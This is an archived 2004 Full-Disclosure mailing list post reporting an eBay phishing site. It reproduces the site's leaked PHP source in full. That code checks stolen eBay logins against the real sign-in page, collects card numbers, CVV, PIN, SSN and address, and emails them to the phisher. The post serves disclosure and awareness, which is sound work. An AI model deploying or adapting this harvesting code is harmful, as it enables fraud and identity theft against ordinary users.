lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <7DC6EDCC0492854E87727F69CA7C9A360734AD@irw002-18714-net-adsl-14.altohiway.com>
From: andrewp at IRW.co.uk (Andrew Poodle)
Subject: phish

Not a very good one..

Submitting with an empty field displayed the raw PHP code..

Seems to send to 

mail("ebaynix@...oo.com","$userid","$userid $pass");

Below..

----------------------8<-------------------------------
<?php
    function query_str ($params) {
        $str = '';
        foreach ($params as $key => $value) {
            $str .= (strlen($str) < 1) ? '' : '&';
            $str .= $key . '=' . rawurlencode($value);
        }
        return ($str);
    }
parse_str($HTTP_SERVER_VARS['QUERY_STRING']);
if($MfcISAPICommand=="SignInFPP"){
  include 'login.php';
}
elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$userid=str_replace(" ","",$userid);
$pass=str_replace(" ","",$pass);
$fd =
fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI
nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us
erid=$userid&pass=$pass","r");
  while ($line=fgets($fd,1000))
  {
	if(strstr($line,"not valid"))
	$signerr=1;
	if(strstr($line,"Your User ID is not valid"))
	$signerr=2;
  }
fclose ($fd);
if($signerr)
	include 'login.php';
else{
mail("ebaynix@...oo.com","$userid","$userid $pass");
include 'step1.php';
}
}
elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){
include 'step2.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$firstname = rtrim($firstname);
$lastname = rtrim($lastname);
$street = rtrim($street);
$city = rtrim($city);
$zip = rtrim($zip);
$dayphone12 = rtrim($dayphone12);
$dayphone22 = rtrim($dayphone22);
$dayphone32 = rtrim($dayphone32);
$dayphone42 = rtrim($dayphone42);

$error = 0;
if (!strlen($firstname)){
        $error = 1;
        $firstnameerr = 1;
}

if (!strlen($lastname)){
        $error = 1;
        $lastnameerr = 1;
}
if (!strlen($street)){
        $error = 1;
        $streeterr = 1;
}
if (!strlen($city)){
        $error = 1;
        $cityerr = 1;
}
/*if ($state == "default"){
        $error = 1;
        $rstateerr = 1;
}
*/
if (!strlen($zip) && !is_numeric($zip)){
        $error = 1;
        $ziperr = 1;
}
if (!strlen($dayphone12)){
        $error = 1;
        $dayphone12err = 1;
}
if (!strlen($dayphone22)){
        $error = 1;
        $dayphone22err = 1;
}
if (!strlen($dayphone32)){
        $error = 1;
        $dayphone32err = 1;
}
if(strlen($ssn)<1){
$error=1;
$ssnerr=1;
}

if ($error == 1)
	include 'step2.php';
else
    include 'step3.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$ccnumber = rtrim($ccnumber);
$ccmonth = rtrim($ccmonth);
$ccyear = rtrim($ccyear);
$cvv = rtrim($cvv);
$pin = rtrim($pin);

$error = 0;
$a = substr($ccnumber,0,1);

if($a == "3"){
	if (strlen($cvv) != 4){
		$error = 1;
		$cvverr = 1;
	}
}
elseif($a == "4"){
	if (strlen($cvv) != 3){
		$error = 1;
		$cvverr = 1;
	}
}
elseif($a == "5"){
	if (strlen($cvv) != 3){
		$error = 1;
		$cvverr = 1;
	}
}
elseif($a == "6"){
        if (strlen($cvv) != 3){
                $error = 1;
                $cvverr = 1;
        }
}
else{
	$error = 1;
	$ccnumbererr = 1;}

if(strlen($ccnumber)!=16){
$error=1;
$ccnumbererr=1;
}
//ccmonth si ccyear;

if(!strcmp($pin,"1234")||!strcmp($pin,"0000")){
$pinerr=1;
$error=1;
}

if(strlen($pin)<4){
$pinerr=1;
$error=1;
}

if($error==1) include 'step3.php';
else{
$message="-------------------------------------------------------
-=::: Login Info :::=-

user: $userid
pass: $pass
e-mail: $email

-=::: Credit Card Info :::=-

Credit Card Number: $ccnumber
Expiration Date: $ccmonth/$ccyear
CVV2: $cvv
PIN: $pin
Full Name: $firstname $lastname
Address: $street
City: $city
State: $state
Zip: $zip
Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42
Country: $country
SSN: $ssn
";
mail("ebaynix@...oo.com","Fullinfo: $ccnumber","$message");
include 'process.htm';
}

}

elseif ($MfcISAPICommand=="SuccessfullFPP")
	include 'success.htm';
else
	include 'error.htm';
?>

----------------------------------------------------------------
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of D B
Sent: 08 November 2004 10:21
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] phish

another ebay phish

http://www.ebay-verifications.biz/ws2/

header 

X-Apparently-To:	 geggam692000@...oo.com via
216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800
X-YahooFilteredBulk:	66.139.79.218
X-Originating-IP:	[66.139.79.218]
Return-Path:	<apache@...2.triasite.net>
Received:	from 66.139.79.218 (EHLO www2.triasite.net)
(66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004
14:17:22 -0800
Received:	(from apache@...alhost) by www2.triasite.net
(8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004
16:24:42 -0600
Date:	Sun, 7 Nov 2004 16:24:42 -0600
Message-Id:
<200411072224.iA7MOgr24317@...2.triasite.net>
To:	geggam692000@...oo.com
Subject:	eBay Database Critical Update Notification!
From:	"eBay" <accounts@...y.com>  Add to Address
BookAdd to Address Book
Reply-to:	
MIME-Version:	1.0
Content-Type:	text/html
Content-Transfer-Encoding:	8bit
Content-Length:	2058



		
__________________________________
Do you Yahoo!? 
Check out the new Yahoo! Front Page. 
www.yahoo.com 
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ